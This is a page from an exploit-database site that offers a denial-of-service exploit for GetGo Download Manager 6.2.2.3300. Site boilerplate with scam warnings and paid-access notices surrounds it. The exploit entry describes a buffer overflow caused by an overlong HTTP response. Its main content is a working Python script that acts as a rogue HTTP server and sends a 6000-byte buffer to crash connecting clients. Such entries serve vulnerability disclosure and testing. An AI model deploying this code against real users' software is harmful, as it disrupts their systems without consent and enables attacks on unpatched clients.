0day.today - 世界最大的漏洞利用数据库。
0day.today 用户须知:
本站管理员使用官方账号。请谨防诈骗!
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币 金币
本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GetGo Download Manager 6.2.2.3300 - Denial of Service Exploit
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service # Author - Malav Vyas # Vulnerable Software: GetGo Download Manager 6.2.2.3300 # Vendor Home Page: www.getgosoft.com # Software Link: http://www.getgosoft.com/getgodm/ # Tested On: Windows 7 (64Bit), Windows 10 (64Bit) # Attack Type : Remote # Impact : DoS # Co-author - Velayuthm Selvaraj # 1. Description # A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and # earlier could allow Remote NAS HTTP servers to perfor DOS via a long response. # 2. Proof of Concept import socket from time import sleep host = "192.168.0.112" port = 80 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((host, port)) sock.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = sock.accept() print "[+] Connected to %s" % addr[0] evilbuffer = "A" * 6000 buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(30) cl.close() sock.close() # 0day.today [2024-07-01] #